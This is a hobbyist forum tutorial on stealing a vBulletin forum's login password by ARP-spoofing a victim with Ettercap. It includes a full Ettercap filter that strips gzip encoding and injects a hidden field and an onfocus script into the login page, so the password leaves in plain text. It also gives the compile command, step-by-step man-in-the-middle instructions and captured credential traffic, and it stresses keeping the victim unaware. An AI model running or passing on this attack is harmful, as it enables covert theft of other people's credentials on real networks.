sorry for my totally POOR English :-(

I did this mini tutorial cos i wanted to play with ettercap filters.

If u had ever sniffed for username and password from RE Forum, U would noticed that the username is sent in clear text but the password is sent as a MD5 hash. The MD5 hash is computed by a javascript. If we look into the source code of the main forum page "http://forums.remote-exploit.org/index.php" we can notice that the MD5 javascript is located here "http://forums.remote-exploit.org/clientscript/vbulletin_md5.js". Lets look at the first line of the login section of the index.php. 'onsubmit' means that when we press LOG IN button 'md5hash' javascript function is executed. The value entered to password field 'vb_login_password'is sent to the javascript and next the MD5 hash is computed and send back to the FORM as a 'vb_login_md5password' and 'vb_login_md5password_utf'.How to "hack" this login method ? Of course we can sniff username and md5 hash and then md5 can be broken by rainbow table. But i think there are a lot of other better way to get the password. I like Ettercap and its packet filters. Thatís why I 'hacked' the forum using my own Ettercap filter. OK. the main idea is that the password must be forced to be send to the web server in plain text. it's obvious that the User shouldnt notices that his/her network is sniffed. So the login script must be modified in that way to allow normal logging into the forum. The simplest way to do this is modifying login section of index.php. As we see bellow, there are input tags, type='hidden'. These fields are filed in by a java md5hash script and next are sent to the server. I think the best solution is just to add new input field and copy password string to there. To do this, existing html code must be modified. Lets use ETTERCAP and its filters. But first we should look at the http traffic generated by RE Forum during logging in. Start the ETHEREAL. As we see, HTML source code isnít sent in plain text! It is compressed by gzip (deflate). To disable this feature we have to remove from HTTP packets this entry "Accept-Encoding:gzip,deflate" and replace it by something other(i've seen ettercap and yahoo tutorial,thats why i know this ;-). Lets use one of Ettetcap filters to eliminate gzip compression. Now we can sniff network and we notice that the forum page is sent without gzip compresion ! pure HTML code ! so let's modify sth. I suggest replace a useless part of line 14 by sth useful like new input tag ;-)
I added ONFOCUS to login button section cos I wanted to assign "vb_login_password.value" to x.value from new input tag to send the x to the server in plain text.

onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" />

now we have new useless parameter 'x' which is send in plain text to the server to the 'login.php'. Server ignores it, however we donít cos this is our desired password!

To start sniffing, ettercap filter must be compiled.
1.create new empty file ForumFilter.filter
2.copy and paste the included ettercap filter into the file
3.compile it. 'etterfilter ForumFilter.filter -o ForumFilter'

next, start ettercap
1.Sniff ->Unified Sniffing
2.Host -> Scan for Hosts
3.Host -> Host List and add victims machine to target 1 and router etc. to target 2
4.MITM -> ARP Spoofing, Sniff Remote connections
5.Filter - > Load new filter, ...than open our ForumFilter
6.Start - > start sniffing

next start ETHEREAL
network is sniffed
if everything is done correctly, the username and password should appear in plain text in the sniffer.

this is the screenshot from ETHEREAL
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://forums.remote-exploit.org/index.php
Cookie: bbsessionhash=5613a271e92e68758bede781f8795775; bblastvisit=1157060031; bblastactivity=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 183

vb_login_username=eXterminator&vb_login_password=&x=#######&s=&do=login&vb_login_md5password=10219952f5b55f33 4be8e24b6ce0ed6f&vb_login_md5password_utf=10216952 f5b87d8b88e24b6ab0ed6fHTTP/1.0 200 OK





line nr 14 after modification:
<td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or c" onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" /></td>


this is the login form from index.php
<!-- login form -->
1 <form action="login.php" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
2 <script type="text/javascript" src="clientscript/vbulletin_md5.js"></script>
3 <table cellpadding="0" cellspacing="3" border="0">
4
5 <tr>
6 <td class="smallfont">User Name</td>
7 <td><input type="text" class="bginput" style="font-size: 11px" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" onfocus="if (this.value == 'User Name') this.value = '';" /></td>
8 <td class="smallfont" colspan="2" nowrap="nowrap"><label for="cb_cookieuser_navbar"><input type="checkbox" name="cookieuser" value="1" tabindex="103" id="cb_cookieuser_navbar" accesskey="c" />Remember Me?</label></td>
9 </tr>
10 <tr>
11 <td class="smallfont">Password</td>
12
13 <td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" size="10" accesskey="p" tabindex="102" /></td>
14 <td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile for yourself." accesskey="s" /></td>
15 </tr>
16 </table>
17 <input type="hidden" name="s" value="" />
18 <input type="hidden" name="do" value="login" />
19 <input type="hidden" name="vb_login_md5password" />
20 <input type="hidden" name="vb_login_md5password_utf" />
21 </form>

<!-- / login form -->

MY ETTERCAP FILTER

if (search(DATA.data, "gzip")) {
replace("gzip", " "); # note: four spaces in the replacement string
msg("whited out gzip\n");
}
if (search(DATA.data, "deflate")) {
replace("deflate", " "); # note: seven spaces in the replacement string
msg("whited out deflate\n");
}
if (search(DATA.data, "gzip,deflate")) {
replace("gzip,deflate", " "); # note: seven spaces in the replacement string
msg("whited out deflate and gzip\n");
}
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
if (search(DECODED.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
msg("zapped AcceptDECODED-Encoding!\n");
}
if (search(DATA.data, "click the 'register'")) {
replace("lick the 'register' button to create a profile for yourself.\x22 accesskey=\x22s\x22 />", "\x22 onfocus=\x22x.value =vb_login_password.value\x22 /><input type=\x22hidden\x22 name=\x22x\x22 />");
msg("REPLACED\n");
}